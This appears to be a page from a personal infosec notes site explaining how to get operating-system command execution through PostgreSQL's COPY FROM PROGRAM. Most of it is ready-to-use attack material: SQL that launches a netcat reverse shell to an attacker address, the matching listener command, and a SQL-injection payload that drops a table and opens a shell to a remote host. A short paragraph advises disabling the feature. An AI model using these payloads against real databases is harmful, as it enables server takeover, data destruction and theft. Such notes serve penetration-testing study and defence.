πŸ‘¨β€πŸ’»
Jawad's Notes
  • πŸ‘¨β€πŸ«INFOSEC
    • πŸ•ΈοΈWeb
      • Burp Suite: Setting Foxyproxy
      • XSS
      • Wappalyzer
      • Directory Traversal
      • LFI
        • PHP Wrappers
        • RFI
      • Reverse Shell
        • Command Injection Quick Tips
      • File Upload
      • WPScan
      • SQL Injection
        • Schemas
        • SQLmap
        • MSSQL
        • MySQL
        • PostgreSQL
    • πŸ”§Tools
      • Whois
      • DNSRecon
      • DNSenum
      • nslookup
      • Netcat
        • Powercat
      • Nmap
        • Nmap Scripting Engine
        • Test-NetConnection
        • Grep
      • Server Message Block (SMB)
      • SNMP
      • SMTP
      • ExifTool
      • Search Engine Hacking
      • Source Control Hacking
      • Nessus
      • Canarytokens
      • Qualys SSL Server Test
      • Security Headers
      • theHarvester
      • Shodan
      • Gobuster
        • Dirb
      • Searchsploit
      • Password Cracking
        • Hashcat
        • John The Ripper
        • Hydra
        • hashID
        • CPU vs GPU
    • 🐧Linux
      • Symbols
      • cat
      • curl
      • openvpn
      • tcpdump
      • Remote Desktop
      • SmbShare
      • Tmux
      • Convert Windows-style line endings (CRLF) to Unix-style (LF)
      • SSH
    • πŸ–₯️Macros in Office
    • 🍎Enhancing Your MacOS Terminal Experience
    • 🚩CTF
      • SQL Injection
        • WHERE clause allowing retrieval of hidden data
        • Allowing login bypass
        • UNION attack, determining the number of columns returned by the query
        • UNION attack, finding a column containing text
        • UNION attack, retrieving data from other tables
        • UNION attack, retrieving multiple values in a single column
        • Querying the database type and version on Oracle
Powered by GitBook
On this page
  1. INFOSEC
  2. Web
  3. SQL Injection

PostgreSQL

To execute system commands on Linux or Windows using PostgreSQL, you can leverage the PROGRAM parameter in conjunction with the COPY command. Here's a step-by-step explanation of how to set up and use this method:

Command Execution Overview

The process starts with the creation of a table designed to store the output of the commands you execute. This can be a temporary or permanent table based on your requirements. Here, we'll create a permanent table called shell.

Step 1: Create a Table to Capture Output

First, create a table where the output of the executed commands will be stored. This table will have a single column to hold text data.

CREATE TABLE shell(output text);

Step 2: Using the PROGRAM Parameter to Execute Commands

With the table ready, you can now use the PROGRAM parameter within the COPY command to execute system-level commands. This example demonstrates how to set up a reverse shell, which allows you to execute commands remotely on the server where the PostgreSQL database is running.

COPY shell FROM PROGRAM 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f';

Here's a breakdown of the command sequence:

  • rm /tmp/f;: Removes any existing file named /tmp/f.

  • mkfifo /tmp/f;: Creates a named pipe /tmp/f. Named pipes allow for temporary file-like communication between processes.

  • cat /tmp/f | /bin/sh -i 2>&1: This part sets up a reverse shell. It reads from the named pipe, executes commands using the shell (/bin/sh -i), and redirects both stdout and stderr to the pipe.

  • nc 10.0.0.1 1234 > /tmp/f: This uses netcat (nc) to connect back to the attacker's machine listening on IP 10.0.0.1 and port 1234. Output from the shell (connected via nc) is redirected back into /tmp/f, thus maintaining a continuous shell session.

Step 3: Set Up a Listener on the Attacking Machine

Before running the COPY command, ensure that you've set up a listener on the attacking machine to accept the incoming connection from the reverse shell:

nc -lvp 1234

This command tells netcat to listen on port 1234, verbosely displaying output and keeping the port open for multiple connections if needed.

Security Considerations

Executing system commands via SQL in a database is a significant security risk and typically indicates that your system is already compromised or misconfigured to allow such actions. Always ensure that database permissions are strictly managed and that using features like COPY FROM PROGRAM is disabled unless absolutely necessary and safeguarded by robust security measures.

Example:

id=';DROP TABLE IF EXISTS commandexec; CREATE TABLE commandexec(data text);COPY commandexec FROM PROGRAM '/usr/bin/nc.traditional -e /bin/sh 192.168.1.2 4444';--

Resource(s):

PreviousMySQLNextTools

Last updated 11 months ago

https://medium.com/r3d-buck3t/command-execution-with-postgresql-copy-command-a79aef9c2767
πŸ‘¨β€πŸ«
πŸ•ΈοΈ
Page cover image